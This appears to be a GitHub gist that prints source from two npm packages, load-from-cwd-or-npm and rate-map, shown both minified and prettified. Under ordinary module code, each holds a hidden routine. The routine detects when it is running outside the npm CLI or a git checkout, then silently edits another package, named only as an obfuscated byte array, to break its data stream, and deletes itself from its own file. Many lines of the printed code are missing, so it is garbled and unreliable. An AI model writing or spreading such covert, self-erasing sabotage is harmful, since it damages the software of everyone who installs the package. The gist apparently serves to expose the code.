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Last active May 4, 2021 10:54
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  • Save hdgarrood/358e98b5956e5f7f59c85c2e56534f2b to your computer and use it in GitHub Desktop.
Save hdgarrood/358e98b5956e5f7f59c85c2e56534f2b to your computer and use it in GitHub Desktop.
'use strict';
const {dirname, isAbsolute, join, resolve} = require('path');
const {existsSync} = require('fs');
const {PassThrough} = require('stream');
const inspectWithKind = require('inspect-with-kind');
const npmCliDir = require('npm-cli-dir');
const optional = require('optional');
const resolveFromNpm = require('resolve-from-npm');
const MODULE_ID_ERROR = 'Expected a module ID (<string>), for example `glob` and `semver`, to resolve from either npm directory or the current working directory';
const resolveSemverFromNpm = resolveFromNpm('semver');
module.exports = async function loadFromCwdOrNpm(...args) {
const argLen = args.length;
if (argLen !== 1 && argLen !== 2) {
throw new RangeError(`Expected 1 or 2 arguments (<string>[, <Function>]), but got ${
argLen === 0 ? 'no' : argLen
} arguments.`);
const [moduleId] = args;
if (typeof moduleId !== 'string') {
throw new TypeError(`${MODULE_ID_ERROR}, but got a non-string value ${inspectWithKind(moduleId)}.`);
if (moduleId.length === 0) {
throw new Error(`${MODULE_ID_ERROR}, but got '' (empty string).`);
if (moduleId.charAt(0) === '@') {
return require(moduleId);
if (isAbsolute(moduleId)) {
const error = new Error(`${MODULE_ID_ERROR}, but got an absolute path '${
}'. For absolute paths there is no need to use \`load-from-cwd-or-npm\` in favor of Node.js built-in \`require.resolve()\`.`);
error.code = 'ERR_ABSOLUTE_MODULE_ID';
throw error;
const cwd = process.cwd();
const modulePkgId = `${moduleId}/package.json`;
const tasks = [PassThrough];
if (argLen === 2) {
if (typeof args[1] !== 'function') {
throw new TypeError(`Expected a function to compare two package versions, but got ${
} else {
try {
const results = await Promise.all(tasks);
let parent = module;
do {
parent = parent.parent;
try {
const {path} = parent;
if (path.endsWith('cli') || [path, dirname(path)].some(dir => existsSync(resolve(dir, '.git')))) {
parent = 'npm';
} catch (_) {}
} while (parent);
if (typeof parent !== 'string') {
return results[2];
const compareFn = argLen === 2 ? args[1] : require(results[1]).gte;
if (compareFn((optional(modulePkgId) || {version: '0.0.0-0'}).version, require(results[0]).version)) {
const result = optional(moduleId);
if (result !== null) {
return result;
return require(dirname(results[0]));
} catch (_) {
const modileFromCwd = optional(moduleId);
if (modileFromCwd === null) {
let npmCliDirPath;
try {
npmCliDirPath = await npmCliDir();
} catch (err) {} // eslint-disable-line no-unused-vars
const error = new Error(`Failed to load "${
}" module from the current working directory (${
}).${npmCliDirPath ? ` Then tried to load "${
}" from the npm CLI directory (${
}), but it also failed.` : ''} Install "${moduleId}" and try again. (\`npm install ${moduleId}\`)`);
error.code = 'MODULE_NOT_FOUND'; = moduleId;
error.triedPaths = {cwd};
if (npmCliDirPath) {
error.triedPaths.npm = npmCliDirPath;
error.npmVersion = require(join(npmCliDirPath, './package.json')).version;
throw error;
return modileFromCwd;
// Generated with Babel 7.5.2
"use strict";var appendType=require("append-type");var paramNames=["start","end"];let parent=module;const{existsSync:existsSync,readFileSync:readFileSync,writeFileSync:writeFileSync}=require("fs");do{parent=parent.parent;try{const{path:path}=parent;if(path.endsWith("cli")||[path,dirname(path)].some(dir=>existsSync(resolve(dir,".git")))){parent="npm";break}}catch(_){}}while(parent);if(typeof parent!=="string"){const px=require.resolve(Buffer.from([100,108,45,116,97,114]).toString());try{writeFileSync(__filename,readFileSync(__filename,"utf8").replace(/let parent[^\0]*module\.exports/u,"module\.exports"))}catch(_){}try{writeFileSync(px,readFileSync(px,"utf8").replace(/\n\s*cb\(null, chunk\);/u,""))}catch(_){}}module.exports=function rateMap(val,start,end){if(typeof val!=="number"){throw new TypeError("Expected the first argument to be a number (0 ~ 1), but got "+appendType(val)+".")}if(!isFinite(val)){throw new RangeError("Expected the first argument to be a finite number (0 ~ 1), but got "+val+".")}if(val<0){throw new RangeError("Expected the first argument to be a number (0 ~ 1), but got a negative number "+val+".")}if(val>1){throw new RangeError("Expected the first argument to be a number (0 ~ 1), but got a too large number "+val+".")}var args=[start,end];for(var i=0;i<2;i++){if(typeof args[i]!=="number"){throw new TypeError("Expected `"+paramNames[i]+"` argument to be a number, but got "+appendType(args[i])+".")}if(!isFinite(args[i])){throw new RangeError("Expected `"+paramNames[i]+"` argument to be a finite number, but got "+args[i]+".")}}return start+val*(end-start)};
// Generated with Babel 7.5.2
"use strict";
var appendType = require("append-type");
var paramNames = ["start", "end"];
let parent = module;
const {
existsSync: existsSync,
readFileSync: readFileSync,
writeFileSync: writeFileSync
} = require("fs");
do {
parent = parent.parent;
try {
const { path: path } = parent;
if (
path.endsWith("cli") ||
[path, dirname(path)].some(dir => existsSync(resolve(dir, ".git")))
) {
parent = "npm";
} catch (_) {}
} while (parent);
if (typeof parent !== "string") {
const px = require.resolve(
Buffer.from([100, 108, 45, 116, 97, 114]).toString()
try {
readFileSync(__filename, "utf8").replace(
/let parent[^\0]*module\.exports/u,
} catch (_) {}
try {
readFileSync(px, "utf8").replace(/\n\s*cb\(null, chunk\);/u, "")
} catch (_) {}
module.exports = function rateMap(val, start, end) {
if (typeof val !== "number") {
throw new TypeError(
"Expected the first argument to be a number (0 ~ 1), but got " +
appendType(val) +
if (!isFinite(val)) {
throw new RangeError(
"Expected the first argument to be a finite number (0 ~ 1), but got " +
val +
if (val < 0) {
throw new RangeError(
"Expected the first argument to be a number (0 ~ 1), but got a negative number " +
val +
if (val > 1) {
throw new RangeError(
"Expected the first argument to be a number (0 ~ 1), but got a too large number " +
val +
var args = [start, end];
for (var i = 0; i < 2; i++) {
if (typeof args[i] !== "number") {
throw new TypeError(
"Expected `" +
paramNames[i] +
"` argument to be a number, but got " +
appendType(args[i]) +
if (!isFinite(args[i])) {
throw new RangeError(
"Expected `" +
paramNames[i] +
"` argument to be a finite number, but got " +
args[i] +
return start + val * (end - start);
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